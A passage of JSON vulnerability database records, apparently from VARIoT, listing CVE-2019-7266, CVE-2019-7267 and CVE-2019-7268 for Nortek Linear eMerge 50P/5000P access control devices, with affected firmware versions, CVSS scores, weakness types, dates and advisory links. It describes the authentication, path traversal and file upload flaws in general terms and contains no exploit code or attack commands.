"db": "CNNVD",
"id": "CNNVD-201907-097"
}
]
},
"id": "VAR-201907-0167",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34617"
},
{
"db": "VULHUB",
"id": "VHN-158701"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34617"
}
]
},
"last_update_date": "2023-12-18T13:23:40.601000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006014"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-565",
"trust": 1.1
},
{
"problemtype": "CWE-287",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158701"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006014"
},
{
"db": "NVD",
"id": "CVE-2019-7266"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.applied-risk.com/resources/ar-2019-006"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7266"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/155250/linear-emerge50p-5000p-4.6.07-remote-code-execution.html"
},
{
"trust": 1.7,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 1.7,
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-184-01"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7266"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/47293"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2294/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34617"
},
{
"db": "VULHUB",
"id": "VHN-158701"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006014"
},
{
"db": "NVD",
"id": "CVE-2019-7266"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-097"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-34617"
},
{
"db": "VULHUB",
"id": "VHN-158701"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006014"
},
{
"db": "NVD",
"id": "CVE-2019-7266"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-097"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34617"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158701"
},
{
"date": "2019-07-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006014"
},
{
"date": "2019-07-02T17:15:12.133000",
"db": "NVD",
"id": "CVE-2019-7266"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-097"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34617"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-158701"
},
{
"date": "2019-07-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006014"
},
{
"date": "2022-10-13T19:46:08.313000",
"db": "NVD",
"id": "CVE-2019-7266"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-097"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-097"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge 50P/5000P Authentication vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006014"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-097"
}
],
"trust": 0.6
}
}
VAR-201907-0168
Vulnerability from variot - Updated: 2023-12-18 13:23Linear eMerge 50P/5000P The device contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Linear eMerge 50P / 5000P is a browser-managed access control security system from Nortek Security & Control.
Linear eMerge 50P / 5000P has a directory traversal vulnerability. An attacker could use this vulnerability to traverse the file system to access files or directories outside the restricted directory. The vulnerability stems from a network system or product that fails to properly filter resources or special elements in file paths
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0168",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge 50p",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "4.6.07"
},
{
"model": "linear emerge 5000p",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "4.6.07"
},
{
"model": "linear emerge 5000p",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge 50p",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "security \u0026 control linear emerge 50p 5000p version)",
"scope": "eq",
"trust": 0.6,
"vendor": "nortek",
"version": "/\u003c=4.6.07(79330"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34616"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006145"
},
{
"db": "NVD",
"id": "CVE-2019-7267"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_50p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.6.07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_50p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_5000p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.6.07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_5000p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7267"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sipke Mellema",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-096"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7267",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-7267",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-34616",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-158702",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7267",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7267",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2019-34616",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-096",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-158702",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34616"
},
{
"db": "VULHUB",
"id": "VHN-158702"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006145"
},
{
"db": "NVD",
"id": "CVE-2019-7267"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-096"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge 50P/5000P The device contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Linear eMerge 50P / 5000P is a browser-managed access control security system from Nortek Security \u0026 Control. \n\nLinear eMerge 50P / 5000P has a directory traversal vulnerability. An attacker could use this vulnerability to traverse the file system to access files or directories outside the restricted directory. The vulnerability stems from a network system or product that fails to properly filter resources or special elements in file paths",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006145"
},
{
"db": "CNVD",
"id": "CNVD-2019-34616"
},
{
"db": "VULHUB",
"id": "VHN-158702"
}
],
"trust": 1.35
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7267",
"trust": 3.1
},
{
"db": "ICS CERT",
"id": "ICSA-20-184-01",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "155250",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006145",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-096",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-34616",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2294",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "47258",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158702",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34616"
},
{
"db": "VULHUB",
"id": "VHN-158702"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006145"
},
{
"db": "NVD",
"id": "CVE-2019-7267"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-096"
}
]
},
"id": "VAR-201907-0168",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34616"
},
{
"db": "VULHUB",
"id": "VHN-158702"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34616"
}
]
},
"last_update_date": "2023-12-18T13:23:40.572000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EMERGE 50P/5000P BROWSER MANAGED ACCESS SYSTEMS 4.X",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/products/access-control-systems/emerge-browser-managed-access-systems-2/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006145"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158702"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006145"
},
{
"db": "NVD",
"id": "CVE-2019-7267"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.applied-risk.com/resources/ar-2019-006"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7267"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/155250/linear-emerge50p-5000p-4.6.07-remote-code-execution.html"
},
{
"trust": 1.7,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 1.7,
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-184-01"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7267"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/47258"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2294/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34616"
},
{
"db": "VULHUB",
"id": "VHN-158702"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006145"
},
{
"db": "NVD",
"id": "CVE-2019-7267"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-096"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-34616"
},
{
"db": "VULHUB",
"id": "VHN-158702"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006145"
},
{
"db": "NVD",
"id": "CVE-2019-7267"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-096"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34616"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158702"
},
{
"date": "2019-07-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006145"
},
{
"date": "2019-07-02T17:15:12.197000",
"db": "NVD",
"id": "CVE-2019-7267"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-096"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34616"
},
{
"date": "2020-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158702"
},
{
"date": "2019-07-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006145"
},
{
"date": "2022-10-13T19:49:26.520000",
"db": "NVD",
"id": "CVE-2019-7267"
},
{
"date": "2020-07-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-096"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-096"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge 50P/5000P Path traversal vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006145"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-096"
}
],
"trust": 0.6
}
}
VAR-201907-0169
Vulnerability from variot - Updated: 2023-12-18 13:23Linear eMerge 50P/5000P devices allow Unauthenticated File Upload. Linear eMerge 50P/5000P The device contains a vulnerability related to unlimited uploads of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Linear eMerge 50P / 5000P is a browser-managed access control security system from Nortek Security & Control. An attacker could use this vulnerability to upload a file with an arbitrary extension to a directory in the application's Web root directory and execute the uploaded file with the permissions of the Web server
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0169",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge 50p",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "4.6.07"
},
{
"model": "linear emerge 5000p",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "4.6.07"
},
{
"model": "linear emerge 5000p",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge 50p",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "security \u0026 control linear emerge 50p 5000p version)",
"scope": "eq",
"trust": 0.6,
"vendor": "nortek",
"version": "/\u003c=4.6.07(79330"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34615"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006077"
},
{
"db": "NVD",
"id": "CVE-2019-7268"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_50p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.6.07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_50p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_5000p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.6.07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_5000p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7268"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sipke Mellema",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-095"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7268",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2019-7268",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
